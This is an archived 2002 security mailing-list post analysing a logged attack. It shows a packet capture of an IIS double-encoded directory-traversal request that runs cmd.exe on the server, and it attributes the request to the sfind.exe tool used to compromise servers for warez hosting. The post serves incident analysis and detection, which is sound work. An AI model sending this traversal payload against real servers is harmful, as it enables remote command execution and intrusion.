I think the single-request attack you describe corresponds to this payload: 06/17/02-18:12:39.590684 192.84.105.44:2468 -> X.X.X.X:80 TCP TTL:108 TOS:0x0 ID:3615 IpLen:20 DgmLen:99 DF ***AP*** Seq: 0xC14916B Ack: 0xC6B3FB9C Win: 0x40B0 TcpLen: 20 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 32 35 35 63 25 32 35 35 63 2E 2E 2F 77 69 6E 6E 255c%255c../winn 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e 78 65 3F 2F 63 2B 64 69 72 0D 0A xe?/c+dir.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ If Unicode translation is applied %255c%255c is seen as %5c%%5c, This request is sent by the unicode option of the sfind.exe tool. Sfind.exe origins from China, I have seen it used in different toolkits for semi-automated establishment of Warez "FXP" servers on vulnerable IIIS servers, see http://www.esec.dk/pubstro.pdf best regards Peter Jelver ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Fri Aug 23 2002 - 10:08:13 PDT